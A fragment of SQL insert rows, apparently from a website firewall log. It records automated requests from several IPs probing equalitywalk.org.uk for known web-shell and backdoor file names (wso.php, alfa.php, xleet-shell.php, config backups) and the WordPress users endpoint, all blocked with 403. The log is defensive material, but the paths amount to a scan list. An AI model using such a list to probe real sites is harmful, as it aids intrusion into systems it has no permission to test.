,('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/content.php','','{\"1\":\"python-requests\\/2.28.1\"}','ny5rkRFsaiqZW7DhMSLcvf3P',0,1673906018.8730,98,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/old-index.php','','{\"1\":\"python-requests\\/2.28.1\"}','8F2YDKRjVPOxdhG70yTEZBcQ',0,1673906019.1242,92,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/new-index.php','','{\"1\":\"python-requests\\/2.28.1\"}','6TmvJKkUDei3AtrHEoghLzMN',0,1673906019.3218,94,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/admin.php','','{\"1\":\"python-requests\\/2.28.1\"}','DOLXPN1ok25uBtTlCbh9nEGK',0,1673906019.5373,94,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-includes/css/xm.php','','{\"1\":\"python-requests\\/2.28.1\"}','TWfNwEn2G7XRdlZp6SDoc4ik',0,1673906019.8016,131,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wikindex.php','','{\"1\":\"python-requests\\/2.28.1\"}','ZDw8Yqro3gXumMyKOab9c4ns',0,1673906020.0494,112,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/ups.php','','{\"1\":\"python-requests\\/2.28.1\"}','C9hgZsinkNwTXyb61Q4YxOfa',0,1673906020.9689,99,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/media-admin.php','','{\"1\":\"python-requests\\/2.28.1\"}','Vy9tUQTxEIfHhpOAYdg3q8vR',0,1673906021.1737,135,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/mt/pekok.php','','{\"1\":\"python-requests\\/2.28.1\"}','5d8uUEfNXZwhoCOc3LykFKle',0,1673906021.5635,94,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp_wrong_datlib.php','','{\"1\":\"python-requests\\/2.28.1\"}','xT1FWI8DeR0lp49btY2QuwhA',0,1673906021.7543,93,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/fw.php','','{\"1\":\"python-requests\\/2.28.1\"}','dIlE2NJpPqjVWgZOrQ4HK91x',0,1673906021.9780,98,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/.cgi/cache/index.php','','{\"1\":\"python-requests\\/2.28.1\"}','D5rJ6q8hQowSYX2eGpfPvNbB',0,1673906022.3717,91,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/fox.php','','{\"1\":\"python-requests\\/2.28.1\"}','GKH76PFndimykBSpQo4NCOr2',0,1673906022.5706,134,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/fox.php','','{\"1\":\"python-requests\\/2.28.1\"}','N86OStqrlkc720PHaUL5QXns',0,1673906022.9031,93,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/xleet.php','','{\"1\":\"python-requests\\/2.28.1\"}','E2VbK4UrcB9kWTv716Fn8jyD',0,1673906023.1377,125,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/radio.php','','{\"1\":\"python-requests\\/2.28.1\"}','OMpECHn83UvygNTohxqRIlu9',0,1673906023.3761,96,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-includes/css/css.php','','{\"1\":\"python-requests\\/2.28.1\"}','5gkXQMjchut2oRLaO0DIBNT9',0,1673906024.0568,110,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-includes/css/wp-atom.php','','{\"1\":\"python-requests\\/2.28.1\"}','EzSL2XxjHoY4FPtVmn05KfO3',0,1673906024.3003,110,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/export.php','','{\"1\":\"python-requests\\/2.28.1\"}','GTJ2Q4bt9dhDRUnIKYOg5kry',0,1673906024.6327,88,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-includes/images/wp-blog.php','','{\"1\":\"python-requests\\/2.28.1\"}','ljr2UT9yu3pNQiOSYxwMaKCV',0,1673906024.8706,103,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-includes/css/wp.php','','{\"1\":\"python-requests\\/2.28.1\"}','32SsezokJ9VMrLb1Z6KPExB7',0,1673906025.1702,94,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/mini.php','','{\"1\":\"python-requests\\/2.28.1\"}','1W2x9aS7XHT6tGdDf8NYuCrL',0,1673906025.4568,98,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wso.php','','{\"1\":\"python-requests\\/2.28.1\"}','eVjv0TkZqbwKU5EfXPolnQDt',0,1673906026.8016,122,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/alwso.php','','{\"1\":\"python-requests\\/2.28.1\"}','atP2yZMxW4jd759wEb8uO6pf',0,1673906027.0694,139,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/shx.php','','{\"1\":\"python-requests\\/2.28.1\"}','3Kach2FZSJBvzYNPDGLbyn0X',0,1673906027.4022,110,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-admin/includes/class-wp-media-list-data.php','','{\"1\":\"python-requests\\/2.28.1\"}','2thpH8seFWgPwvbAqDXScViZ',0,1673906028.5338,102,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/shell20220621.php','','{\"1\":\"python-requests\\/2.28.1\"}','Qn6vtk1F3MGiRhTV4AJIYep2',0,1673906029.6253,116,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/lufix.php','','{\"1\":\"python-requests\\/2.28.1\"}','vTELFSe9Vug5WkcN4ma1IGUZ',0,1673906029.8794,90,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/xleet-shell.php','','{\"1\":\"python-requests\\/2.28.1\"}','yBGs5rWNuA7Ff4nmq9XDUdb0',0,1673906030.7227,110,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/1.php','','{\"1\":\"python-requests\\/2.28.1\"}','uk2eX9Es1IHa45SrMpDj6BQL',0,1673906031.0335,121,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/alfa.php','','{\"1\":\"python-requests\\/2.28.1\"}','s39qMUdAjZRkLH1Fn4Q5ixvV',0,1673906031.3279,107,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-admin/radio.php','','{\"1\":\"python-requests\\/2.28.1\"}','0Hcoj7lmSpigBkhO1WV6GzFv',0,1673906032.1826,122,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/autoload_classmap.php','','{\"1\":\"python-requests\\/2.28.1\"}','O6UoEWpuaQ1L0b5nTgYkGmi9',0,1673906032.5233,138,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/a.php','','{\"1\":\"python-requests\\/2.28.1\"}','s0VULmlCERJPhHDSvj6XiFbK',0,1673906032.8950,94,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/s.php','','{\"1\":\"python-requests\\/2.28.1\"}','CTLM3uB1pGiJr0hXHARtIejS',0,1673906033.1414,95,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/c.php','','{\"1\":\"python-requests\\/2.28.1\"}','6E5YT31G9DUscvx8PdSeyjkL',0,1673906033.5152,133,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-includes/autoload_classmap.php','','{\"1\":\"python-requests\\/2.28.1\"}','nTJ47bj3VeCMP2ZNwxFkDvy6',0,1673906033.9453,112,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/images/vuln.php','','{\"1\":\"python-requests\\/2.28.1\"}','UNmA96qCWTPXa2rkcb5fxFIM',0,1673906034.2129,98,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/.tmb/cache/shz.php','','{\"1\":\"python-requests\\/2.28.1\"}','JRzBAtp7iaq2vy0DNSCdh4cf',0,1673906034.5672,113,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/m.php','','{\"1\":\"python-requests\\/2.28.1\"}','DEbJTv2NzgwBk5di1e8VQ9Y4',0,1673906034.8990,100,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/b.php','','{\"1\":\"python-requests\\/2.28.1\"}','MFZxVtLybilXe3rvGpDYBUmQ',0,1673906035.2739,126,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/x.php','','{\"1\":\"python-requests\\/2.28.1\"}','fca1Kiqj6UPJp2LbmuAQ70Iv',0,1673906035.8034,115,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/404.php','','{\"1\":\"python-requests\\/2.28.1\"}','uO9K7TCWiGRSMFDdzmUyQslB',0,1673906036.1757,127,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/sym403.php','','{\"1\":\"python-requests\\/2.28.1\"}','roiKSGpJTFfcqP9enZAvQV5O',0,1673906036.4641,107,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-includes/wp-class.php','','{\"1\":\"python-requests\\/2.28.1\"}','6Vdgnk5pATK8vhJx2QWi4oeL',0,1673906036.8247,92,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/xmlrpcs.php','','{\"1\":\"python-requests\\/2.28.1\"}','UKS91Cbx0Y4neREVOfoNTiqF',0,1673906037.1613,85,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/0z.php','','{\"1\":\"python-requests\\/2.28.1\"}','2pt0kEA1wYM7JaSR3czeXdiC',0,1673906037.4314,104,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-includes/customize/class-wp-customize-nav-menu.php?new','','{\"1\":\"python-requests\\/2.28.1\"}','jlt38AopnThBwa0v4USzc7Ry',0,1673906037.7563,93,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/about.php','','{\"1\":\"python-requests\\/2.28.1\"}','qXCldhsptMruz2x9T7wBZFR1',0,1673906037.9730,103,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/o.php','','{\"1\":\"python-requests\\/2.28.1\"}','hJm2GjQV4zUfYA1Wtryu09Fn',0,1673906039.1065,83,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/indeeex.php','','{\"1\":\"python-requests\\/2.28.1\"}','FqZsv8DACb7TazB6RKXJn3ik',0,1673906039.5080,93,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/ne.php','','{\"1\":\"python-requests\\/2.28.1\"}','VkbaHG17C0NESZlYQTiOeAtj',0,1673906039.7851,93,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/ff.php?pass=shell','','{\"1\":\"python-requests\\/2.28.1\"}','s7yrYGtpeRah2bMwzZcCV1nj',0,1673906039.9930,112,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/8.php','','{\"1\":\"python-requests\\/2.28.1\"}','7uaf6MxKnT3D9Jko2vQ8bZAg',0,1673906040.3821,115,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-includes/radio.php','','{\"1\":\"python-requests\\/2.28.1\"}','6xdMjLnAe5DV8S9zpo1Ps0FY',0,1673906040.6705,130,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-includes/IXR/hunt.php','','{\"1\":\"python-requests\\/2.28.1\"}','Evesr7aM2Sfk6XyJ5DYHqClo',0,1673906040.9204,96,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/xx.php','','{\"1\":\"python-requests\\/2.28.1\"}','hgs8brVjJIwqPzMtvkSRoHFO',0,1673906041.2144,130,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/1975.php','','{\"1\":\"python-requests\\/2.28.1\"}','R5vHTiF7Z9OoQN1KBmsWrMdX',0,1673906041.4556,89,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/small.php','','{\"1\":\"python-requests\\/2.28.1\"}','j7VGNIErLYWsAlFm0Uhg2XyT',0,1673906041.7390,101,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-json/','','{\"1\":\"python-requests\\/2.28.1\"}','b1EWuwoIyZvPTN3M50Apkz9a',0,1673906576.1941,134,'','GET',403,0,520,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-json/wp/v2/users/','','{\"1\":\"python-requests\\/2.28.1\"}','wjrqlAoTBhV6Hc2CezRnpyI8',0,1673907320.7503,119,'','GET',403,0,520,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-includes/ID3/content.php','','{\"1\":\"python-requests\\/2.28.1\"}','YmJVkSMyN65wQ90vGcBFtrTb',0,1673907531.9230,115,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-includes/fonts/css.php','','{\"1\":\"python-requests\\/2.28.1\"}','AYdlLP4pNU9mhXf1kF86IBe5',0,1673907542.9827,103,'','GET',403,0,700,0,1,'',0),('156.146.33.88',2626822488,'','https://www.equalitywalk.org.uk/style.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','MRcNQDSPVfgxaJ5btes6Zv1Y',0,1673913544.4343,490,'','GET',403,0,700,0,1,'',0),('156.146.33.88',2626822488,'','https://www.equalitywalk.org.uk/wp-admin/style.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','6euqzYf2MscpWkvGPmSFI1ER',0,1673913591.7982,1268,'','GET',403,0,700,0,1,'',0),('156.146.33.88',2626822488,'','https://www.equalitywalk.org.uk/s_e.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','8Lm5o6Y9JvTK3tuykhCj0VeO',0,1673913638.9605,529,'','GET',403,0,700,0,1,'',0),('156.146.33.88',2626822488,'','https://www.equalitywalk.org.uk/s_ne.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','A7fmFEP31qMWeN8SDiRhXuko',0,1673913640.2678,766,'','GET',403,0,700,0,1,'',0),('156.146.33.88',2626822488,'','https://www.equalitywalk.org.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','BRPgdSwEfkOI0Dc763GNLMmH',0,1673913641.7355,845,'','GET',403,0,700,0,1,'',0),('156.146.33.88',2626822488,'','https://www.equalitywalk.org.uk/radio.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','LSmYde2xb5uV4Jt79jH8WoNR',0,1673913643.7274,596,'','GET',403,0,700,0,1,'',0),('138.199.19.193',2328302529,'','https://www.equalitywalk.org.uk/doc.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','S2kj6PLJpUfGFAXyrC9MuEKz',0,1673913666.9752,891,'','GET',403,0,700,0,1,'',0),('138.199.19.193',2328302529,'','https://www.equalitywalk.org.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','vBu4spncCbMkIJGDlQ8HT7R5',0,1673913669.1931,936,'','GET',403,0,700,0,1,'',0),('138.199.19.193',2328302529,'','https://www.equalitywalk.org.uk/beence.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','25RGWlFgz6d7LTSoYNnX1yHr',0,1673913670.8522,840,'','GET',403,0,700,0,1,'',0),('138.199.19.193',2328302529,'','https://www.equalitywalk.org.uk/ups.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','vN1qlpxGu7QJWtTnc0iK39BP',0,1673913672.3932,504,'','GET',403,0,700,0,1,'',0),('138.199.19.193',2328302529,'','https://www.equalitywalk.org.uk/wp-signin.php?dizo&ping','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','l30nzpxIiu5sLt1FVTwWqPDS',0,1673913673.8895,559,'','GET',403,0,700,0,1,'',0),('138.199.19.193',2328302529,'','https://www.equalitywalk.org.uk/media-admin.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','9Gjmo2yYqLrM4pVXEnSFazdw',0,1673913675.3756,451,'','GET',403,0,700,0,1,'',0),('138.199.19.193',2328302529,'','https://www.equalitywalk.org.uk/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','oQgBsrY1M9KNSa6Xd03AnGTm',0,1673913677.0852,628,'','GET',403,0,700,0,1,'',0),('138.199.19.193',2328302529,'','https://www.equalitywalk.org.uk/wp-includes/wp-class.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','1yuU2CKH0es3goAZLnFvBmfd',0,1673913733.2047,883,'','GET',403,0,700,0,1,'',0),('138.199.19.193',2328302529,'','https://www.equalitywalk.org.uk/wp-includes/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','47R3MQx8OJE6tnm0UBFTK9Ab',0,1673913804.3382,768,'','GET',403,0,700,0,1,'',0),('138.199.19.193',2328302529,'','https://www.equalitywalk.org.uk/wp-includes/images/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','hsGlcIKbZ9vgaXOArHVjwD1x',0,1673913818.0431,938,'','GET',403,0,700,0,1,'',0),('138.199.19.193',2328302529,'','https://www.equalitywalk.org.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','bm3kN8UPFc1vsi4hLd0aGVDw',0,1673913819.2876,545,'','GET',403,0,700,0,1,'',0),('138.199.19.193',2328302529,'','https://www.equalitywalk.org.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','yo3e5vT1Uu8KFgQBH2lWhfzm',0,1673913820.6802,983,'','GET',403,0,700,0,1,'',0),('138.199.19.193',2328302529,'','https://www.equalitywalk.org.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','I3n9bYOjmi4ohVkM5qsCygcp',0,1673913822.7466,600,'','GET',403,0,700,0,1,'',0),('138.199.19.193',2328302529,'','https://www.equalitywalk.org.uk/wp-booking.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','S3fZgGdpHx5JCjTiK8ruXRIE',0,1673913871.2563,763,'','GET',403,0,700,0,1,'',0),('138.199.19.193',2328302529,'','https://www.equalitywalk.org.uk/config.bak.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','VoDax0Or6NTvMwhekfb1RW7Q',0,1673913891.7062,673,'','GET',403,0,700,0,1,'',0),('138.199.19.193',2328302529,'','https://www.equalitywalk.org.uk/legion.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','jCIpNv75qZB2rS0MKVWlFdGO',0,1673913893.3545,884,'','GET',403,0,700,0,1,'',0),('138.199.19.193',2328302529,'','https://www.equalitywalk.org.uk/wp-plugins.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','cB0gH2dxDikp367SYMbnu1Za',0,1673913895.6131,601,'','GET',403,0,700,0,1,'',0),('138.199.19.193',2328302529,'','https://www.equalitywalk.org.uk/gank.php.PhP','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','3C8zNQhaiS75uBkZAXJjHwWy',0,1673913896.9723,496,'','GET',403,0,700,0,1,'',0),('138.199.19.193',2328302529,'','https://www.equalitywalk.org.uk/archives.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','MCugI6Y1roVTvkbAnRipSBeK',0,1673913898.8775,664,'','GET',403,0,700,0,1,'',0),('138.199.19.193',2328302529,'','https://www.equalitywalk.org.uk/defau11.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','rEBniG1DWLQyFR6gtxs23Afh',0,1673913934.8339,452,'','GET',403,0,700,0,1,'',0),('138.199.19.193',2328302529,'','https://www.equalitywalk.org.uk/system_log.php?bala=up','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','XyRnfkPMZrQBLiDOCFdWTvSH',0,1673913950.8727,951,'','GET',403,0,700,0,1,'',0),('138.199.19.193',2328302529,'','https://www.equalitywalk.org.uk/wp-backup-sql-302.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','mFuKCLvpUqi1afJZjnR0Q7GE',0,1673913952.7414,515,'','GET',403,0,700,0,1,'',0),('91.239.130.203',1542423243,'','https://www.equalitywalk.org.uk/error.php?phpshells','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','ySPZaok4jBg8VIQTAcNn70KX',0,1673913954.0833,626,'','GET',403,0,700,0,1,'',0),('156.146.33.76',2626822476,'','https://www.equalitywalk.org.uk/olux.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','HtqmLPKepYOSGbZi3fxaAzdU',0,1673914778.1533,161,'','GET',403,0,700,0,1,'',0),('156.146.33.76',2626822476,'','https://www.equalitywalk.org.uk/xleet.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','Y6virBNuT7dsoIQclHGp3U0A',0,1673914778.5532,156,'','GET',403,0,700,0,1,'',0),('156.146.33.76',2626822476,'','https://www.equalitywalk.org.uk/wso.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','ad7LzqsvB3NYbhEyVMZ9gHQj',0,1673914779.9131,233,'','GET',403,0,700,0,1,'',0),('156.146.33.76',2626822476,'','https://www.equalitywalk.org.uk/shell.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','ml9JMiuftxho52QEXyg7Hn6G',0,1673914816.0805,116,'','GET',403,0,700,0,1,'',0),('91.238.82.107',1542345323,'','https://www.equalitywalk.org.uk/up.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','kIanSedusjl7RzgfTmBoyLxr',0,1673914868.7010,165,'','GET',403,0,700,0,1,'',0),('91.238.82.107',1542345323,'','https://www.equalitywalk.org.uk/upload.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','kZFqwuC4Te56v0oPGzWNt27R',0,1673914933.5305,118,'','GET',403,0,700,0,1,'',0),('91.238.82.107',1542345323,'','https://www.equalitywalk.org.uk/1.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','at9BKTU4MVRoSg1WNce2sQF3',0,1673914953.6277,221,'','GET',403,0,700,0,1,'',0),('91.238.82.107',1542345323,'','https://www.equalitywalk.org.uk/x.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','1rzPiv8ZGBSRUkKCyfJa0Exu',0,1673914983.0680,139,'','GET',403,0,700,0,1,'',0),('91.238.82.107',1542345323,'','https://www.equalitywalk.org.uk/z.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','kQlO0r3STXv96thGdpI5zDEu',0,1673914983.8073,147,'','GET',403,0,700,0,1,'',0),('91.238.82.107',1542345323,'','https://www.equalitywalk.org.uk/a.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','RGlkQrUxj0oAKew9c8MWXhmi',0,1673914990.4483,137,'','GET',403,0,700,0,1,'',0),('91.238.82.107',1542345323,'','https://www.equalitywalk.org.uk/test.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','KOB2v4kWgTQqsFxYXoc50nVU',0,1673915005.8332,464,'','GET',403,0,700,0,1,'',0),('91.238.82.107',1542345323,'','https://www.equalitywalk.org.uk/wp.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','ojdw5tXZcPQbyqxiMU3uW47e',0,1673915036.4984,315,'','GET',403,0,700,0,1,'',0),('91.238.82.107',1542345323,'','https://www.equalitywalk.org.uk/alfa.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','eKEiLswhOP5CYcr6MHlb1TSU',0,1673915054.2174,219,'','GET',403,0,700,0,1,'',0),('5.161.41.233',94448105,'','https://www.equalitywalk.org.uk/wp-includes/css/css.php','','{\"1\":\"python-requests\\/2.27.1\"}','rzv2MZqPDBgipIc4aTYWRLl1',0,1673917342.6425,2196,'','GET',403,0,700,0,1,'',0),('5.161.41.233',94448105,'','https://www.equalitywalk.org.uk/wp-includes/fonts/css.php','','{\"1\":\"python-requests\\/2.27.1\"}','SFV9T74DvZpoPxGlaKHcwu3k',0,1673917368.6012,176,'','GET',403,0,700,0,1,'',0),('193.142.146.138',3247346314,'','https://www.equalitywalk.org.uk/abruzi.php4','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','wYoV9vqGKzue1bOPTycrMEZU',0,1673917931.1465,89,'','GET',403,0,700,0,1,'',0),('5.161.41.233',94448105,'','https://www.equalitywalk.org.uk/wp-includes/css/css.php','','{\"1\":\"python-requests\\/2.27.1\"}','CskfL6dp1aDzIYVFKvZQ0XuJ',0,1673918067.5274,157,'','GET',403,0,700,0,1,'',0),('5.161.41.233',94448105,'','https://www.equalitywalk.org.uk/wp-includes/fonts/css.php','','{\"1\":\"python-requests\\/2.27.1\"}','dHzTvLXrRKYOate3W0kFsnoD',0,1673918089.6446,137,'','GET',403,0,700,0,1,'',0),('193.202.110.30',3251269150,'','https://equalitywalk.org.uk/cong.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/cong.php\"}','MxhaU2WRlicqTEgu5S0CovdB',0,1673919039.0702,846,'','GET',403,0,700,0,1,'',0),('142.93.103.165',2388486053,'','https://equalitywalk.org.uk/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie 